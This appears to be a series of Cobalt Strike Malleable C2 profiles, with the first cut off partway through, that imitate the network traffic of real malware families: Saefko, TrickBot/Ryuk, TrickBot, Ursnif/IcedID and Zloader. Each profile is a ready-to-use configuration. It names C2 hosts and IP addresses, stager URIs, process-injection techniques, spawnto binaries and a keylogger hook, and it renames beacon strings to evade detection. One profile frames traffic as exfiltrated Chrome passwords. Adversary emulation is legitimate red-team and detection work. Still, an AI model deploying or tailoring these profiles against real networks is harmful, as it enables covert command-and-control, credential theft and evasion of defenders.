27 | append "FeJzPWAlzAFfZGVub21pbmF0aW9ucwSTKqgxlbbnLbhBk"; | |
28 | parameter "Mzk2MTw"; | |
29 | ||
30 | ||
31 | } | |
32 | ||
33 | parameter "GUaq" "OynNUEcKZTPj"; | |
34 | ||
35 | } | |
36 | ||
37 | server { | |
38 | ||
39 | header "Server" "nginx/1.6.2"; | |
40 | header "Content-Type" "text/html;charset=UTF-8"; | |
41 | header "Connection" "keep-alive"; | |
42 | header "Vary" "Accept-Encoding"; | |
43 | header "Content-Encoding" "gzip"; | |
44 | ||
45 | ||
46 | output { | |
47 | netbios; | |
48 | ||
49 | prepend "............[....0.<.Wx.a...=-...q..*.%(.. ..~.TFW..U z....))%...of.|.....$.52.....w...~....o..._.....w8.........z......m.[..e....j.9<n.._+..5.uVi.-........qC...V.]n..._..'.w..e............y..o......j..-bdpejjbmbjlndoaaelihhjajeldfojpgnfeeiifgjfdngfhiaamjogcjfkiahfljijinfjbldnplecpebkgbgaijmpcjkpfnbfngbdnccpbnhlbiikgmhjmdakkbd..w.............fu...WY......o8.=..YG..%....:1..... :(.~.......u..n9m..m.......V:m...3......j2....vM....zVv.u."; | |
50 | ||
51 | append "..EQk.....q.....1.t..pNjq...u...m.h..........z+....Z*X.r... | |
52 | ..*..N.z..8.1.m .y.F.1....U.. ......... | |
53 | ....Z'=..+..H...aI ..)..36J~..O.n.....J.....!=G...o._.....s!......-p.....+>........,.r......./......7|>.......2.5ad../.....-lj......N..T...x...9N.. | |
54 | .....N.a=..G..N... | |
55 | .V.L.\"..U.d.Y.....s.....H.|. .4e...(b.CLV....Z..x..^v...%bdpejjbmbjlndoaaelihhjajeldfojpgnfeeiifgjfdngfhiaamjogcjfkiahfljijinfjbldnplecpebkgbgaijmpcjkpfnbfngbdnccpbnhlbiikgmhjmdakkbd...K.).d.......j.~(.y.u+.._c*....S$p.R.).../[email protected]......"; | |
56 | ||
57 | print; | |
58 | ||
59 | ||
60 | } | |
61 | } | |
62 | } | |
63 | ||
64 | http-post { | |
65 | ||
66 | set uri "/gate.php"; | |
67 | ||
68 | client { | |
69 | ||
70 | header "Host" "doueven.click"; | |
71 | header "Connection" "close"; | |
72 | header "Accept-Language" "en-US"; | |
73 | header "Content-Type" "image/jpeg"; | |
74 | ||
75 | output { | |
76 | netbios; | |
77 | print; | |
78 | ||
79 | } | |
80 | ||
81 | ||
82 | id { | |
83 | netbios; | |
84 | header "Cookie"; | |
85 | ||
86 | } | |
87 | } | |
88 | ||
89 | server { | |
90 | ||
91 | header "Server" "Apache"; | |
92 | header "Upgrade" "h2,h2c"; | |
93 | header "Connection" "Upgrade, close"; | |
94 | header "Content-Type" "application/octet-stream"; | |
95 | ||
96 | ||
97 | output { | |
98 | netbios; | |
99 | prepend "IX."; | |
100 | prepend " "; | |
101 | prepend " "; | |
102 | ||
103 | print; | |
104 | } | |
105 | } | |
106 | } | |
107 | ||
108 | http-stager { | |
109 | ||
110 | set uri_x86 "/prink.exe"; | |
111 | set uri_x64 "/Prink.exe"; | |
112 | ||
113 | client { | |
114 | header "Host" "31.31.203.14"; | |
115 | header "Accept-Language" "en-us"; | |
116 | header "Accept" "text/html, application/xml, image/png, image/jpeg, image/gif, image/x-xbitmap"; | |
117 | header "Accept-Charset" "utf-8, utf-16, iso-8859-1"; | |
118 | header "Pragma" "non-cache"; | |
119 | header "Connection" "close"; | |
120 | } | |
121 | ||
122 | server { | |
123 | header "Server" "nginx/1.10.2"; | |
124 | header "Content-Type" "application/octet-stream"; | |
125 | header "Keep-Alive" "timeout=2, max=100"; | |
126 | header "Connection" "close"; | |
127 | header "ETag" "be339-de000-563c784ba5900"; | |
128 | header "Accept-Ranges" "bytes"; | |
129 | ||
130 | } | |
131 | ||
132 | ||
133 | } | |
134 | ||
135 | stage { | |
136 | ||
137 | set compile_time "28 Jan 2018 08:12:18"; | |
138 | set userwx "false"; | |
139 | set image_size_x86 "428544"; | |
140 | set image_size_x64 "428544"; | |
141 | ||
142 | ||
143 | } |
0 | #saefko.profile | |
1 | #https://www.zscaler.com/blogs/research/saefko-new-multi-layered-rat | |
2 | #xx0hcd | |
3 | ||
4 | ###global options### | |
5 | set sleeptime "5000"; | |
6 | set jitter "33"; | |
7 | set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38"; | |
8 | ||
9 | set sample_name "saefko.profile"; | |
10 | ||
11 | http-get { | |
12 | ||
13 | set uri "/love/server.php"; | |
14 | ||
15 | set verb "GET"; | |
16 | ||
17 | client { | |
18 | ||
19 | header "Host" "acpananma.com"; | |
20 | ||
21 | ||
22 | metadata { | |
23 | base64url; | |
24 | parameter "pass"; | |
25 | } | |
26 | ||
27 | parameter "command" "UpdateHTTPIRCStatus"; | |
28 | parameter "machine_id" "202"; | |
29 | parameter "irc_status" "1"; | |
30 | ||
31 | } | |
32 | ||
33 | server { | |
34 | header "Server" "Apache"; | |
35 | header "X-Powered-By" "PHP/5.6.36"; | |
36 | header "Vary" "Accept-Encoding"; | |
37 | header "Content-Type" "text/html; charset=UTF-8"; | |
38 | ||
39 | output { | |
40 | ||
41 | netbios; | |
42 | ||
43 | prepend "ok\n"; | |
44 | prepend "2\n"; | |
45 | ||
46 | append "0\n"; | |
47 | ||
48 | print; | |
49 | } | |
50 | } | |
51 | } | |
52 | ||
53 | http-post { | |
54 | ||
55 | set uri "/Love/server.php"; | |
56 | #set verb "GET"; | |
57 | set verb "POST"; | |
58 | ||
59 | client { | |
60 | ||
61 | header "Content-Type" "application/x-www-form-urlencoded"; | |
62 | header "Host" "acpananma.com"; | |
63 | header "Expect" "100-continue"; | |
64 | header "Connection" "Keep-Alive"; | |
65 | ||
66 | ||
67 | output { | |
68 | base64url; | |
69 | parameter "command"; | |
70 | ||
71 | } | |
72 | ||
73 | id { | |
74 | base64url; | |
75 | parameter "pass"; | |
76 | ||
77 | } | |
78 | ||
79 | } | |
80 | ||
81 | server { | |
82 | header "Host" "acpananma.com"; | |
83 | ||
84 | output { | |
85 | netbios; | |
86 | ||
87 | prepend "\nHTTP/1.1 100 Continue\n\n"; | |
88 | ||
89 | #checked to make sure the misspells were misspelled, uh, correctly? | |
90 | append "irc_channel\":\"null\",\"irc_nickname\":\"jI87fg\",\"irc_password\":\"K8gtr$4\",\"irc_port\":\"6669\",\"irc_server\":\"Setting+up+IRC+service.\",\"machine_active_time\":\"12\",\"machine_artct\":\"x86\",\"machine_bitcoin_value\":\"0\",\"machine_business_value\":\"0\",\"machine_calls_activity\":\"0\",\"machine_camera_activity\":\"8\",\"machine_country_iso_code\":\"8864\",\"machine_creadit_card_posiblty\":\"0\",\"machine_current_time\":\"10:32:45\",\"machine_facebook_activity\":\"0\",\"machine_gaming_value\":\"0\",\"machine_gmail_avtivity\":\"0\",\"machine_googlepluse_activity\":\"0\",\"machine_instgram_activity\":\"0\",\"machine_ip\":\"10.1.23.146\",\"machine_lat\":\"0\",\"machine_lng\":\"eng\",\"machine_os_type\":\"win\",\"machine_register_date\":\"0222\",\"machine_screenshot\":\"1"; | |
91 | print; | |
92 | } | |
93 | } | |
94 | } | |
95 | ||
96 | http-stager { | |
97 | ||
98 | set uri_x86 "/clients2.google.com/generate_204"; | |
99 | set uri_x64 "/clients3.google.com/generate_204"; | |
100 | ||
101 | client { | |
102 | ||
103 | header "Host" "acpananma.com"; | |
104 | ||
105 | } | |
106 | ||
107 | server { | |
108 | header "Server" "Apache"; | |
109 | header "X-Powered-By" "PHP/5.6.36"; | |
110 | header "Vary" "Accept-Encoding"; | |
111 | header "Content-Type" "text/html; charset=UTF-8"; | |
112 | ||
113 | output{ | |
114 | prepend "ok\n"; | |
115 | prepend "2\n"; | |
116 | ||
117 | append "0\n"; | |
118 | print; | |
119 | } | |
120 | ||
121 | } | |
122 | ||
123 | ||
124 | } | |
125 | ||
126 | ||
127 | ||
128 | ||
129 | ###Malleable PE Options### | |
130 | ||
131 | post-ex { | |
132 | ||
133 | set spawnto_x86 "%windir%\\syswow64\\wscript.exe"; | |
134 | set spawnto_x64 "%windir%\\sysnative\\wscript.exe"; | |
135 | ||
136 | set obfuscate "false"; | |
137 | ||
138 | set smartinject "false"; | |
139 | ||
140 | set amsi_disable "false"; | |
141 | ||
142 | } | |
143 | ||
144 | #used peclone on sample from https://app.any.run/tasks/54fe7d78-91d9-4d45-8b65-7333c2c7d480/ | |
145 | stage { | |
146 | set checksum "0"; | |
147 | set compile_time "12 Feb 2019 14:33:03"; | |
148 | set entry_point "159022"; | |
149 | set image_size_x86 "548864"; | |
150 | set image_size_x64 "548864"; | |
151 | #set name ""; | |
152 | set userwx "false"; | |
153 | set cleanup "false"; | |
154 | set stomppe "false"; | |
155 | set obfuscate "false"; | |
156 | set rich_header ""; | |
157 | ||
158 | set sleep_mask "false"; | |
159 | ||
160 | # set module_x86 ""; | |
161 | # set module_x64 ""; | |
162 | ||
163 | transform-x86 { | |
164 | # prepend "\x90\x90\x90"; | |
165 | # strrep "ReflectiveLoader" "6ayBRVW"; | |
166 | # strrep "beacon.dll" "uVRWRut"; | |
167 | } | |
168 | ||
169 | transform-x64 { | |
170 | # prepend "\x90\x90\x90"; | |
171 | # strrep "ReflectiveLoader" "6ayBRVW"; | |
172 | # strrep "beacon.x64.dll" "uVRWRut"; | |
173 | } | |
174 | ||
175 | #can set a string in the .rdata section of the beacon dll. | |
176 | #adds a zero-terminated string | |
177 | #string "something"; | |
178 | ||
179 | #adds a string 'as-is' | |
180 | #data "something"; | |
181 | ||
182 | #adds a wide (UTF-16LE encoded) string | |
183 | #stringw "IMAGE_SCN_MEM_READ"; | |
184 | } | |
185 | ||
186 | ||
187 | #controls process injection behavior | |
188 | process-inject { | |
189 | ||
190 | # set allocator "NtMapViewOfSection"; | |
191 | ||
192 | # set min_alloc "16700"; | |
193 | ||
194 | set userwx "false"; | |
195 | ||
196 | set startrwx "true"; | |
197 | ||
198 | transform-x86 { | |
199 | # prepend "\x90\x90\x90"; | |
200 | } | |
201 | transform-x64 { | |
202 | # prepend "\x90\x90\x90"; | |
203 | } | |
204 | ||
205 | execute { | |
206 | # CreateThread "ntdll!RtlUserThreadStart"; | |
207 | CreateThread; | |
208 | NtQueueApcThread; | |
209 | CreateRemoteThread; | |
210 | RtlCreateUserThread; | |
211 | } | |
212 | } |
0 | #trick_ryuk.profile | |
1 | #for CS 4.2, if not then c2lint will not like it. | |
2 | #https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf | |
3 | #https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/ | |
4 | #xx0hcd | |
5 | ||
6 | ###Global Options### | |
7 | set sample_name "trick_ryuk.profile"; | |
8 | ||
9 | set sleeptime "5000"; | |
10 | set jitter "20"; | |
11 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; | |
12 | ||
13 | set host_stage "true"; | |
14 | ||
15 | ###DNS options### | |
16 | set dns_idle "8.8.8.8"; | |
17 | set maxdns "245"; | |
18 | set dns_sleep "0"; | |
19 | set dns_stager_prepend ""; | |
20 | set dns_stager_subhost ""; | |
21 | set dns_max_txt "252"; | |
22 | set dns_ttl "1"; | |
23 | ||
24 | ###SMB options### | |
25 | set pipename "ntsvcs##"; | |
26 | set pipename_stager "scerpc##"; | |
27 | ||
28 | ###TCP options### | |
29 | set tcp_port "8000"; | |
30 | ||
31 | ####SSH options### | |
32 | set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)"; | |
33 | set ssh_pipename "SearchTextHarvester##"; | |
34 | ||
35 | ###SSL Options### | |
36 | ||
37 | #https-certificate { | |
38 | #set keystore ""; | |
39 | #set password ""; | |
40 | #} | |
41 | ||
42 | #https-certificate { | |
43 | # set C "US"; | |
44 | # set CN "whatever.com"; | |
45 | # set L "California"; | |
46 | # set O "whatever LLC."; | |
47 | # set OU "local.org"; | |
48 | # set ST "CA"; | |
49 | # set validity "365"; | |
50 | #} | |
51 | ||
52 | #code-signer { | |
53 | #set keystore "your_keystore.jks"; | |
54 | #set password "your_password"; | |
55 | #set alias "server"; | |
56 | #} | |
57 | ||
58 | ###HTTP-Config Block### | |
59 | #http-config { | |
60 | # set headers "Server, Content-Type"; | |
61 | # header "Content-Type" "text/html;charset=UTF-8"; | |
62 | # header "Server" "nginx"; | |
63 | # | |
64 | # set trust_x_forwarded_for "false"; | |
65 | #} | |
66 | ||
67 | ###HTTP-GET Block### | |
68 | ||
69 | http-get { | |
70 | ||
71 | set uri "/dd05ce3a-a9c9-4018-8252-d579eed1e670.zip"; | |
72 | ||
73 | client { | |
74 | ||
75 | header "Accept" "text/html, application/xhtml+xml, */*"; | |
76 | header "Accept-Language" "en-US"; | |
77 | header "Host" "23.95.97.59"; | |
78 | header "Connection" "Keep-Alive"; | |
79 | ||
80 | ||
81 | metadata { | |
82 | ||
83 | base64url; | |
84 | prepend "SESSIONID="; | |
85 | header "Cookie"; | |
86 | ||
87 | } | |
88 | ||
89 | } | |
90 | ||
91 | server { | |
92 | header "Server" "Apache"; | |
93 | header "Upgrade" "h2,h2c"; | |
94 | header "Connection" "Upgrade, Keep-Alive"; | |
95 | header "Last-Modified" "Wed, 25 Sep 2019 08:23:20 GMT"; | |
96 | header "ETag" "\"9d441d3-dda-5935c5d9faea6-gzip\""; | |
97 | header "Accept-Ranges" "bytes"; | |
98 | header "Vary" "Accept-Encoding,User-Agent"; | |
99 | header "Keep-Alive" "timeout=5"; | |
100 | ||
101 | output { | |
102 | ||
103 | netbios; | |
104 | ||
105 | prepend "PK.........080..W.3 | |
106 | ...1.....InvoiceStatement.lnk.Z_.^G..m.j.....\".....f{... | |
107 | 7..464.v7.6M..b.o.m..&.M6. | |
108 | ....\"..E..|..P.(R%.J..A.....'..9g...L>....;..;3g........B..1S.. | |
109 | 3.........V....v.......|.....>"; | |
110 | ||
111 | append ".....achor_dns....."; | |
112 | ||
113 | print; | |
114 | } | |
115 | } | |
116 | } | |
117 | ||
118 | #HTTP-GET VARIANT | |
119 | http-get "get_ryuk" { | |
120 | ||
121 | set uri "/files"; | |
122 | ||
123 | client { | |
124 | ||
125 | metadata { | |
126 | ||
127 | base64url; | |
128 | prepend "SESSIONID="; | |
129 | header "Cookie"; | |
130 | ||
131 | } | |
132 | ||
133 | } | |
134 | ||
135 | server { | |
136 | ||
137 | output { | |
138 | ||
139 | netbios; | |
140 | ||
141 | prepend ""; | |
142 | ||
143 | append ""; | |
144 | ||
145 | print; | |
146 | } | |
147 | } | |
148 | } | |
149 | ||
150 | ###HTTP-POST VARIANT### | |
151 | ||
152 | http-post "post_ryuk" { | |
153 | ||
154 | set uri "/id"; | |
155 | set verb "GET"; | |
156 | ||
157 | client { | |
158 | ||
159 | output { | |
160 | netbios; | |
161 | parameter "1"; | |
162 | } | |
163 | id { | |
164 | base64url; | |
165 | parameter "id"; | |
166 | ||
167 | } | |
168 | } | |
169 | server { | |
170 | output { | |
171 | netbios; | |
172 | print; | |
173 | } | |
174 | } | |
175 | } | |
176 | ||
177 | ||
178 | ###HTTP-Post Block### | |
179 | ||
180 | http-post { | |
181 | ||
182 | set uri "/ono19/ADMIN-DESKTOP.AC3B679F4A22738281E6D7B0C5946E42/81/"; | |
183 | #set verb "GET"; | |
184 | set verb "POST"; | |
185 | ||
186 | client { | |
187 | ||
188 | header "Accept" "*/*"; | |
189 | #header "Host" ""; | |
190 | #header "Connection" "close"; | |
191 | header "Content-Type" "multipart/form-data; boundary=-----------KMOGEEQTLQTCQMYE"; | |
192 | ||
193 | ||
194 | output { | |
195 | netbios; | |
196 | #prepend "SESSIONID="; | |
197 | #header "COOKIE"; | |
198 | prepend "-----------KMOGEEQTLQTCQMYE | |
199 | Content-Disposition: form-data; name=\"data\" | |
200 | ||
201 | https://nytimes.com/|Admin|"; | |
202 | append "\n-----------KMOGEEQTLQTCQMYE | |
203 | Content-Disposition: form-data; name=\"source\" | |
204 | ||
205 | chrome passwords | |
206 | -----------KMOGEEQTLQTCQMYE--"; | |
207 | ||
208 | print; | |
209 | ||
210 | } | |
211 | ||
212 | id { | |
213 | base64url; | |
214 | parameter "id"; | |
215 | ||
216 | } | |
217 | } | |
218 | ||
219 | server { | |
220 | ||
221 | header "Connection" "close"; | |
222 | header "Server" "Cowboy"; | |
223 | header "Content-Type" "text/plain"; | |
224 | ||
225 | ||
226 | output { | |
227 | netbios; | |
228 | ||
229 | prepend "/1/\n"; | |
230 | ||
231 | append ""; | |
232 | ||
233 | print; | |
234 | } | |
235 | } | |
236 | } | |
237 | ||
238 | ###HTTP-Stager Block### | |
239 | http-stager { | |
240 | ||
241 | set uri_x86 "/dd05ce3a-a9c9-4018-8252-D579eed1e670.zip"; | |
242 | set uri_x64 "/Dd05ce3a-a9c9-4018-8252-d579eed1e670.zip"; | |
243 | ||
244 | client { | |
245 | ||
246 | header "Host" "51.254.25.115"; | |
247 | header "Connection" "Keep-Alive"; | |
248 | ||
249 | } | |
250 | ||
251 | server { | |
252 | ||
253 | header "Server" "Apache"; | |
254 | header "Upgrade" "h2,h2c"; | |
255 | header "Connection" "Upgrade, Keep-Alive"; | |
256 | header "Last-Modified" "Wed, 25 Sep 2019 08:23:20 GMT"; | |
257 | header "ETag" "\"9d441d3-dda-5935c5d9faea6-gzip\""; | |
258 | header "Accept-Ranges" "bytes"; | |
259 | header "Vary" "Accept-Encoding,User-Agent"; | |
260 | header "Keep-Alive" "timeout=5"; | |
261 | ||
262 | output { | |
263 | ||
264 | print; | |
265 | } | |
266 | ||
267 | } | |
268 | } | |
269 | ||
270 | ||
271 | ###Malleable PE/Stage Block### | |
272 | ||
273 | #some options taken from -> https://otx.alienvault.com/indicator/file/7b9526f82448d0a1fb59a8125d1de55e3a166d72 | |
274 | stage { | |
275 | set checksum "0"; | |
276 | set compile_time "16 Apr 2020 17:56:00"; | |
277 | set entry_point "170000"; | |
278 | set image_size_x86 "383992"; | |
279 | set image_size_x64 "383992"; | |
280 | #set name "WWanMM.dll"; | |
281 | set userwx "false"; | |
282 | set cleanup "false"; | |
283 | set sleep_mask "false"; | |
284 | set stomppe "false"; | |
285 | set obfuscate "false"; | |
286 | set rich_header "bd8cf6bfbbaf89f44f2e0189ce41549f4d4c550a712cc5660619e4ac3b4adce9"; | |
287 | ||
288 | #new 4.2. options | |
289 | #set allocator "HeapAlloc"; | |
290 | #set magic_mx_x86 "MZRE"; | |
291 | #set magic_mz_x64 "MZAR"; | |
292 | #set magic_pe "PE"; | |
293 | ||
294 | set sleep_mask "false"; | |
295 | ||
296 | #set module_x86 "wwanmm.dll"; | |
297 | #set module_x64 "wwanmm.dll"; | |
298 | ||
299 | transform-x86 { | |
300 | #prepend "\x90\x90\x90"; | |
301 | strrep "ReflectiveLoader" ""; | |
302 | strrep "beacon.dll" ""; | |
303 | } | |
304 | ||
305 | transform-x64 { | |
306 | #prepend "\x90\x90\x90"; | |
307 | strrep "ReflectiveLoader" ""; | |
308 | strrep "beacon.x64.dll" ""; | |
309 | } | |
310 | ||
311 | string ",Control_RunDLL \x00"; | |
312 | string "start program with cmdline \"%s"; | |
313 | string "Global\\fde345tyhoVGYHUJKIOuy"; | |
314 | string "get command: incode %s, cmdid \"%s\", cmd \"%s "; | |
315 | string "anchorDNS"; | |
316 | string "Anchor_x86"; | |
317 | string "Anchor_x64"; | |
318 | string "{43 00 4F 00 4E 00 4F 00 55 00 54 00 24 00 00 00}"; | |
319 | string "{6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00}"; | |
320 | string "checkip.amazonaws.com"; | |
321 | string "wtfismyip.com"; | |
322 | string "{83 C4 04 3D 80 00 00 00 73 15 8B 04 85 ?? ?? ?? ?? 85 C0 74 0A 8D 4D D8 51 8B CF FF D0 8A D8 84 DB C7 45 A4 0F 00 00 00}"; | |
323 | string "{48 98 B9 E7 03 00 00 48 3D 80 00 00 00 73 1B 48 8D 15 ?? ?? ?? ?? 48 8B 04 C2 48 85 C0 74 0B 48 8D 55 90 48 8B CE FF D0 8B C8}"; | |
324 | string ":\\Anchor\\Win32\\Release\\Anchor_"; | |
325 | ||
326 | } | |
327 | ||
328 | ###Process Inject Block### | |
329 | process-inject { | |
330 | ||
331 | #set allocator "NtMapViewOfSection"; | |
332 | ||
333 | set min_alloc "16700"; | |
334 | ||
335 | set userwx "false"; | |
336 | ||
337 | set startrwx "false"; | |
338 | ||
339 | transform-x86 { | |
340 | #prepend "\x90\x90\x90"; | |
341 | } | |
342 | transform-x64 { | |
343 | #prepend "\x90\x90\x90"; | |
344 | } | |
345 | ||
346 | execute { | |
347 | CreateThread; | |
348 | CreateRemoteThread; | |
349 | ||
350 | CreateThread "ntdll.dll!RtlUserThreadStart+0x1000"; | |
351 | ||
352 | SetThreadContext; | |
353 | ||
354 | NtQueueApcThread-s; | |
355 | ||
356 | #NtQueueApcThread; | |
357 | ||
358 | CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000"; | |
359 | ||
360 | RtlCreateUserThread; | |
361 | } | |
362 | } | |
363 | ||
364 | ###Post-Ex Block### | |
365 | post-ex { | |
366 | ||
367 | set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe"; | |
368 | set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe"; | |
369 | ||
370 | set obfuscate "false"; | |
371 | ||
372 | set smartinject "false"; | |
373 | ||
374 | set amsi_disable "false"; | |
375 | ||
376 | #new 4.2 options | |
377 | set thread_hint "ntdll.dll!RtlUserThreadStart"; | |
378 | set pipename "DserNamePipe##"; | |
379 | set keylogger "SetWindowsHookEx"; | |
380 | ||
381 | } |
0 | #trickbot | |
1 | #https://community.rsa.com/community/products/netwitness/blog/2017/07/13/necurs-delivers | |
2 | #https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/ | |
3 | #xx0hcd | |
4 | ||
5 | ||
6 | set sleeptime "30000"; | |
7 | set jitter "20"; | |
8 | set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)"; | |
9 | set dns_idle "8.8.8.8"; | |
10 | set maxdns "235"; | |
11 | ||
12 | ||
13 | http-get { | |
14 | ||
15 | set uri "/"; | |
16 | ||
17 | client { | |
18 | ||
19 | header "Host" "203.150.19.63:443"; | |
20 | header "Connection" "Keep-Alive"; | |
21 | header "Cache-Control" "no-cache"; | |
22 | ||
23 | ||
24 | metadata { | |
25 | base64url; | |
26 | prepend "D007="; | |
27 | header "Cookie"; | |
28 | ||
29 | ||
30 | } | |
31 | ||
32 | } | |
33 | ||
34 | server { | |
35 | ||
36 | header "Server" "nginx"; | |
37 | header "Date" "Fri, 30 Jun 2017 13:08:47 GMT"; | |
38 | header "Content-Type" "text/html"; | |
39 | header "Connection" "keep-alive"; | |
40 | ||
41 | ||
42 | output { | |
43 | base64url; | |
44 | prepend "<html> | |
45 | <head><title>404 Not Found</title></head> | |
46 | <body bgcolor='white'> | |
47 | <center><h1>404 Not Found</h1></center> | |
48 | <hr><center>nginx</center> | |
49 | </body> | |
50 | </html> | |
51 | <!CDATA['="; | |
52 | append "']> | |
53 | </html>"; | |
54 | print; | |
55 | } | |
56 | } | |
57 | } | |
58 | ||
59 | http-post { | |
60 | ||
61 | set uri "/response.php"; | |
62 | ||
63 | client { | |
64 | ||
65 | header "Content-Type" "multipart/form-data; boundary=----ZMZTCR"; | |
66 | ||
67 | output { | |
68 | netbios; | |
69 | prepend "----ZMZTCR | |
70 | Content-Disposition: form-data;name='sourcelink' "; | |
71 | ||
72 | append " Content-Disposition: form-data;name='sourcequery' | |
73 | ----ZMZTCR"; | |
74 | print; | |
75 | ||
76 | ||
77 | ||
78 | } | |
79 | ||
80 | ||
81 | id { | |
82 | base64url; | |
83 | header "Cookie"; | |
84 | ||
85 | ||
86 | } | |
87 | } | |
88 | ||
89 | server { | |
90 | ||
91 | header "Server" "nginx"; | |
92 | header "Date" "Fri, 30 Jun 2017 13:08:47 GMT"; | |
93 | header "Content-Type" "text/html; charset=utf-8"; | |
94 | header "Connection" "keep-alive"; | |
95 | ||
96 | ||
97 | output { | |
98 | base64; | |
99 | print; | |
100 | } | |
101 | } | |
102 | } | |
103 | ||
104 | http-stager { | |
105 | server { | |
106 | header "Server" "nginx"; | |
107 | header "Date" "Fri, 30 Jun 2017 13:08:47 GMT"; | |
108 | header "Content-Type" "text/html; charset=utf-8"; | |
109 | header "Connection" "keep-alive"; | |
110 | ||
111 | } | |
112 | ||
113 | ||
114 | } |
0 | #ursnif_IcedID malware profile | |
1 | #https://www.malware-traffic-analysis.net/2018/11/08/index.html | |
2 | #xx0hcd | |
3 | ||
4 | ||
5 | set sleeptime "30000"; | |
6 | set jitter "20"; | |
7 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; | |
8 | set dns_idle "8.8.8.8"; | |
9 | set maxdns "235"; | |
10 | set sample_name "urnif_IcedID profile"; | |
11 | ||
12 | ||
13 | #https-certificate { | |
14 | # set keystore "demo.store"; | |
15 | # set password "whateverpass"; | |
16 | #} | |
17 | ||
18 | ||
19 | #prob have to change Host header to something legit depending on testing. | |
20 | http-get { | |
21 | ||
22 | set uri "/images/U2gVFoeT1Sh8s/"; | |
23 | ||
24 | client { | |
25 | ||
26 | header "Host" "jititliste.com"; | |
27 | header "Accept" "text/html, application/xhtml+xml, */*"; | |
28 | header "Accept-Language" "en-US"; | |
29 | header "DNT" "1"; | |
30 | header "Connection" "Keep-Alive"; | |
31 | ||
32 | ||
33 | metadata { | |
34 | netbios; | |
35 | parameter "id"; | |
36 | ||
37 | } | |
38 | ||
39 | } | |
40 | ||
41 | server { | |
42 | ||
43 | header "Server" "Apache/2.2.22 (Debian)"; | |
44 | header "X-Powered-By" "PHP/5.4.45-0+deb7u14"; | |
45 | header "Pragma" "no-cache"; | |
46 | header "Set-Cookie" "lang=en; expires=Sat, 08-Dec-2018 15:50:58 GMT; path=/; domain=.jititliste.com; id="; | |
47 | header "Vary" "Accept-Encoding"; | |
48 | header "Keep-Alive" "timeout=5, max=100"; | |
49 | header "Connection" "Keep-Alive"; | |
50 | header "Content-Type" "text/html"; | |
51 | ||
52 | ||
53 | ||
54 | ||
55 | ||
56 | #using newline ("\n") shows as a period (".") in c2lint, but looks correct in wireshark. | |
57 | output { | |
58 | ||
59 | netbios; | |
60 | prepend "1faa\n"; | |
61 | print; | |
62 | ||
63 | } | |
64 | } | |
65 | } | |
66 | ||
67 | http-post { | |
68 | ||
69 | set verb "GET"; | |
70 | set uri "/data2.php"; | |
71 | ||
72 | client { | |
73 | ||
74 | header "Host" "themiole.biz"; | |
75 | header "Upgrade" "websocket"; | |
76 | header "Connection" "Upgrade"; | |
77 | ||
78 | output { | |
79 | netbios; | |
80 | prepend "PHPSESSID="; | |
81 | header "Cookie"; | |
82 | ||
83 | ||
84 | } | |
85 | ||
86 | ||
87 | id { | |
88 | netbios; | |
89 | parameter ""; | |
90 | ||
91 | ||
92 | } | |
93 | } | |
94 | ||
95 | server { | |
96 | ||
97 | header "Server" "openresty"; | |
98 | header "Connection" "upgrade"; | |
99 | header "Sec-Websocket-Accept" "Kfh9QIsMVZc16xEPYxPHzW8SZ8w-"; | |
100 | header "Upgrade" "websocket"; | |
101 | ||
102 | ||
103 | ||
104 | output { | |
105 | netbios; | |
106 | prepend "."; | |
107 | prepend "..NPyo=....\n"; | |
108 | append ".......... .......... .........."; | |
109 | print; | |
110 | } | |
111 | } | |
112 | } | |
113 | ||
114 | http-stager { | |
115 | ||
116 | set uri_x86 "/WES/Fatog.php"; | |
117 | set uri_x64 "/WES/fatog.php"; | |
118 | ||
119 | client { | |
120 | header "Host" "mnesenesse.com"; | |
121 | header "Connection" "Keep-Alive"; | |
122 | } | |
123 | ||
124 | server { | |
125 | header "Server" "Apache/2.2.15 (CentOS)"; | |
126 | header "X-Powered-By" "PHP/7.2.11"; | |
127 | header "Content-Discription" "File Transfer"; | |
128 | header "Content-Disposition" "attachment; filename=\"ledo2.xap\""; | |
129 | header "Content-Type" "application/octet-stream"; | |
130 | header "Cache-Control" "must-revalidate"; | |
131 | header "Connection" "close"; | |
132 | ||
133 | } | |
134 | ||
135 | ||
136 | } | |
137 | ||
138 | ||
139 | stage { | |
140 | set checksum "0"; | |
141 | set compile_time "12 Jun 2018 11:22:23"; | |
142 | set image_size_x86 "543900"; | |
143 | set image_size_x64 "543900"; | |
144 | transform-x86 { | |
145 | strrep "beacon.dll" ""; | |
146 | } | |
147 | transform-x64 { | |
148 | strrep "beacon.x64.dll" "aoushdquwe.exe"; | |
149 | } | |
150 | ||
151 | } | |
152 | ||
153 |
0 | #zloader.profile | |
1 | #https://app.any.run/tasks/7c83ff58-4c40-4a41-958b-d9279b917f2b/ | |
2 | #https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/ | |
3 | ||
4 | #xx0hcd | |
5 | ||
6 | ###Global Options### | |
7 | set sample_name "zloader.profile"; | |
8 | ||
9 | set sleeptime "37500"; | |
10 | set jitter "26"; | |
11 | set useragent "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36"; | |
12 | ||
13 | set host_stage "true"; | |
14 | ||
15 | ###DNS options### | |
16 | set dns_idle "8.8.8.8"; | |
17 | set maxdns "245"; | |
18 | set dns_sleep "0"; | |
19 | set dns_stager_prepend ""; | |
20 | set dns_stager_subhost ""; | |
21 | set dns_max_txt "252"; | |
22 | set dns_ttl "1"; | |
23 | ||
24 | ###SMB options### | |
25 | set pipename "ntsvcs"; | |
